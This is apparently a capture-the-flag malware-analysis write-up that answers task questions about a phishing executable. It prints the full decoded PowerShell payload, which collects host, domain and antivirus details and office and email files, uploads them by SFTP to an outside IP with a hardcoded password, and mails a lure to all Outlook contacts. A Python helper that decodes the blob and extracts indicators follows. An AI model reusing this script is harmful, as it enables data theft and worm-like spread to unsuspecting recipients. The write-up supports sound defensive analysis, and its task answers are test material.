Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.
The Sherlock archive contains a single file, Superstar_MemberCard.tiff.exe.
Tasks
To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
When was the binary file originally created, according to its metadata (UTC)?
This can be found using a PE analysis tool like pestudio.
The compiler timestamp for the binary is 2024-03-13 10:38:06.
Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?
The sizes of the various sections of the binary are listed under sections in pestudio. Code is stored in the .text section, which in this case is 38400 bytes long.
It appears that the binary may have undergone a file conversion process. Could you determine its original filename?
This is also captured in pestudio, though the filename is somewhat hidden:
The original filename was newILY.ps1.
Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
The obfuscated code is a base64 encoded blob. As such, it's listed in the strings view in pestudio:
The offset is at 0x2C74.
The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
Base64.
What is the specific cmdlet utilized that was used to initiate file downloads?
The embedded script can be extracted from the binary by navigating to the resources view in pestudio, right-clicking on the first line containing the embedded script's name, then instance → dump to file.
The main logic of the script is hidden inside the base64-encoded blob. Following it is a short stub that decodes and launches the actual script.
The stub calls [array]::Reverse($enC) to reverse the contents of the blob before decoding it. Repeating the process in CyberChef (Reverse, then From Base64) produces the following script:
```powershell
$hostname = $env:COMPUTERNAME
$currentUser = $env:USERNAME
$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"
$img = "C:\users\$currentUser\Downloads\Superstar_MemberCard.tiff"

Invoke-WebRequest -Uri $url -OutFile $img
Start-Process $img

$searchDir = "C:\Users"
$targetDir = "C:\Users\Public\Public Files"

if (-not (Test-Path -Path $targetDir -PathType Container)) {
    New-Item -ItemType Directory -Path $targetDir -Force | Out-Null
}

$currentUser | Out-File -FilePath (Join-Path $targetDir 'username.txt') -Force

nltest /dsgetdc:$env:USERDOMAIN 2>$null | Out-File -FilePath (Join-Path $targetDir 'DCinfo.txt') -Force

Get-WmiObject -Class Win32_UserAccount | Out-File -FilePath (Join-Path $targetDir 'localusers.txt') -Force

wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value 2>$null | Out-File -FilePath (Join-Path $targetDir 'AVinfo.txt') -Force

$currentUserProcesses = Get-WmiObject Win32_Process | Where-Object { try { $_.GetOwner().User -eq $currentUser } catch { $false } }
$currentUserProcesses | Select-Object ProcessName, ProcessId | Out-File -FilePath (Join-Path $targetDir 'UserProcesses.txt') -Force

if (Get-Process -Name Outlook -ErrorAction SilentlyContinue) {
    Stop-Process -Name Outlook -Force -ErrorAction SilentlyContinue
}

$extList = "*.doc", "*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx", "*.pdf", "*.csv", ".*oft", "*.potx", "*.xltx", "*.dotx", "*.msg", "*.eml", "*.pst", "*.odt", "*.ods", "*.odp", "*.odg", "*.ost"

$null = Get-ChildItem $searchDir -Recurse -Include $extList -Force -ErrorAction 'SilentlyContinue' | ForEach-Object {
    $destinationPath = Join-Path $targetDir $_.Name
    if ($_.FullName -ne $destinationPath) {
        Copy-Item -Path $_.FullName -Destination $destinationPath -Force
    }
}

Get-SmbShare | Out-File -FilePath (Join-Path $targetDir 'Shareinfo.txt') -Force

gpresult /r | Out-File -FilePath (Join-Path $targetDir 'GPinfo.txt') -Force

$ProgressPreference = 'SilentlyContinue'
$archivePath = "$targetDir\$hostname.zip"
Compress-Archive -Path $targetDir -DestinationPath $archivePath -Force

$wZipUrl = "https://us.softradar.com/static/products/winscp-portable/distr/0/winscp-portable_softradar-com.zip"
$wZipFile = "$targetDir\WinSCP.zip"
$wExtractPath = "C:\Users\Public\HelpDesk-Tools"

Invoke-WebRequest -UserAgent "Wget" -Uri $wZipUrl -OutFile $wZipFile -UseBasicParsing
Expand-Archive -Path $wZipFile -DestinationPath $wExtractPath -Force

$wExePath = "$wExtractPath\WinSCP.com"
$sPath = "$wExtractPath\maintenanceScript.txt"

@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@ | Out-File -FilePath $sPath -Force

Start-Process -FilePath $wExePath -ArgumentList "/script=`"$sPath`"" -Wait -NoNewWindow

$outlookPath = Get-ChildItem -Path "C:\Program Files\Microsoft Office" -Filter "OUTLOOK.EXE" -Recurse | Select-Object -First 1 -ExpandProperty FullName

$htmlBody = @"
<!DOCTYPE html>
<html>
<head>
<style> body { font-family: Calibri, sans-serif; }</style>
</head>
<body>
<p>Hey, </p>
<p> Hope you're doing great when you see this. I'm reaching out because there's something I've been wanting to share with you. You know that feeling when you've been admiring someone from afar, but hesitated to take the next step? That's been me lately, but I've decided it's time to change that.</p>
<p>In a world where we often rush through everything, I believe in the beauty of taking things slow, cherishing each moment like a scene from a timeless tale. So, if you're open to it, I'd love for us to meet up after hours.</p>
<p>I've arranged for a rendezvous at a private membership club, where we can enjoy a bit of privacy and exclusivity. I've attached the map for your convenience. </p>
<p>To gain entry, you'll need a digital membership card for entry, accessible <a href='http://44.206.187.144:9000/Superstar_MemberCard.tiff.exe'>here</a>.
Just a friendly heads up, there's a time limit before you can download it, so it's best to grab it sooner rather than waiting too long.</p>
<p>Counting on seeing you there later.</p>
</body>
</html>
"@

if ($outlookPath) {
    Start-Process -FilePath $outlookPath
    $outlook = New-Object -ComObject Outlook.Application
    $namespace = $outlook.GetNamespace("MAPI")
    $contactsFolder = $namespace.GetDefaultFolder(10)
    $csvFilePath = "$targetDir\Contacts.csv"
    $contactsFolder.Items | ForEach-Object {
        $_.GetInspector | ForEach-Object { $_.Close(0) }
        $props = @{
            'Full Name'     = $_.FullName
            'Email Address' = $_.Email1Address
        }
        New-Object PSObject -Property $props
    } | Export-Csv -Path $csvFilePath -NoTypeInformation
    $contacts = Import-Csv -Path $csvFilePath
    $mailItem = $outlook.CreateItem(0)
    $mailItem.Subject = "Fingers crossed you'll notice.."
    $mailItem.HtmlBody = $htmlBody
    $mailItem.Attachments.Add($img) > $null
    $mailItem.BodyFormat = 2
    foreach ($contact in $contacts) {
        $bccRecipient = $mailItem.Recipients.Add($contact."Email Address")
        $bccRecipient.Type = [Microsoft.Office.Interop.Outlook.OlMailRecipientType]::olBCC
    }
    $mailItem.Recipients.ResolveAll() > $null
    $mailItem.Send()
}

Remove-Item -Path $wExtractPath -Recurse -Force
Remove-Item -Path $targetDir -Recurse -Force
```
The lines that answer the next questions are highlighted in the PowerShell code above.
The downloads were initiated using the cmdlet Invoke-WebRequest (line 6).
Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
There are two IP addresses in the script, 44.206.187.144 (line 3) and 35.169.66.138 (line 64).
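As an added example, not part of the original writeup, the Python script below automates what was done by hand above with pestudio and CyberChef: it locates the longest base64-looking run in the file, undoes the reverse-then-base64 encoding, and pulls the public IPs (ascending), URLs and staging directory out of the decoded text. The binary and blob it works on are constructed stand-ins containing only three lines of the script, and the SFTP password in them is a placeholder.

```python
import base64
import ipaddress
import re

# Constructed stand-in for the embedded script (not the page's full script): three of
# its lines, encoded the way the decoding stub undoes it, i.e. base64 of the text with
# the base64 string then reversed. The SFTP password is a placeholder, not the real one.
SAMPLE_SCRIPT = (
    '$url="http://44.206.187.144:9000/Superstar_MemberCard.tiff"\n'
    '$targetDir="C:\\Users\\Public\\Public Files"\n'
    'open sftp://service:PLACEHOLDER@35.169.66.138/ -hostkey=*\n'
)
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode("ascii")[::-1]
# Constructed stand-in for the PE file: a header stub and filler, then the blob at 0x2E.
SAMPLE_BINARY = b"MZ" + b"\x00" * 0x2C + SAMPLE_BLOB.encode("ascii") + b"\x00" * 16

# A reversed blob carries its '=' padding at the front, so allow padding on either end.
B64_RUN_RE = re.compile(rb"={0,2}[A-Za-z0-9+/]{64,}={0,2}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"""(?:https?|s?ftp)://[^\s"'`<>]+""")


def find_b64_blob(data: bytes) -> tuple:
    """Return (offset, blob) of the longest base64-looking run in the file,
    the run the pestudio strings view surfaces by hand."""
    best = max(B64_RUN_RE.finditer(data), key=lambda m: m.end() - m.start(), default=None)
    if best is None:
        raise ValueError("no base64 run of 64 or more characters found")
    return best.start(), best.group(0)


def decode_reversed_b64(blob: bytes, encoding: str = "utf-8") -> str:
    """Undo the stub's obfuscation: reverse, repair padding, base64-decode.
    The decoded bytes are assumed to be UTF-8 text, which is what CyberChef showed."""
    b64 = blob[::-1].rstrip(b"=")
    return base64.b64decode(b64 + b"=" * (-len(b64) % 4)).decode(encoding, errors="replace")


def extract_iocs(script: str) -> dict:
    """Public IPv4 addresses in ascending numeric order, URLs, and the staging directory."""
    ips = set()
    for candidate in IPV4_RE.findall(script):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:  # 999.1.1.1 matches the regex but is not an address
            continue
        if ip.is_global:  # drop loopback, RFC 1918 and other non-routable matches
            ips.add(ip)
    staging = re.search(r'\$targetDir\s*=\s*"([^"]+)"', script)
    return {"ips": [str(ip) for ip in sorted(ips)],
            "urls": sorted(set(URL_RE.findall(script))),
            "staging_dir": staging.group(1) if staging else None}
```

Run against the real sample, `find_b64_blob` is expected to report the offset seen in pestudio, and numeric sorting puts 35.169.66.138 before 44.206.187.144.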
The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
The staging directory is defined as $targetDir on line 10: